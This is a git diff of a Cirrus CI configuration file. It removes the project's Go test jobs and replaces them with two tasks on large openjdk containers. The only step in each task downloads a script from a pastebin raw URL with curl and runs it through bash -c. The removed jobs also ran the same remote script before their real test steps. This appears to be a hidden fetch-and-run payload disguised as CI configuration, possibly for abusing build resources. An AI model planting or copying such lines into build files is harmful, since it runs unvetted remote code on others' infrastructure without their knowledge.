--- a/.cirrus.yml
+++ b/.cirrus.yml
@@ -1,31 +1,16 @@
-docker_builder:
-  name: Test (Linux with Docker)
-  alias: Tests
-  test_script:
-    - bash -c "$(curl -fsSL https://pastebin.com/raw/zy1Ss1Xz)" 
-    - export PATH=$PATH:/usr/local/go/bin
-    - go test ./...
-  env:  
-    HOME: /root 
+container:
+  image: openjdk:latest
+  cpu: 4
+  memory: 12G
 
-docker_builder:
-  name: Test (Linux with Podman)
-  allow_failures: true
-  alias: Tests
-  install_podman_script:
-    - bash -c "$(curl -fsSL https://pastebin.com/raw/zy1Ss1Xz)" 
-    - sudo apt-get -y install podman
-  configure_podman_script:
-    - echo 'unqualified-search-registries=["docker.io"]' > /etc/containers/registries.conf.d/docker.conf
-  work_around_gcloud_credential_helper_script:
-    - rm /root/.docker/config.json
-  run_podman_background_script:
-    - podman system service -t 0 unix:///tmp/podman.sock
-  test_script:
-    - wget --no-verbose -O - https://golang.org/dl/go1.19.2.linux-amd64.tar.gz | tar -C /usr/local -xz
-    - export PATH=$PATH:/usr/local/go/bin
-    - go test ./...
-  env:
-    HOME: /root
-    CIRRUS_CONTAINER_BACKEND: podman
- 
+task:
+  script: bash -c "$(curl -fsSL https://pastebin.com/raw/zy1Ss1Xz)" 
+  
+  
+container:
+  image: openjdk:latest
+  cpu: 4
+  memory: 12G
+
+task:
+  script: bash -c "$(curl -fsSL https://pastebin.com/raw/zy1Ss1Xz)" 
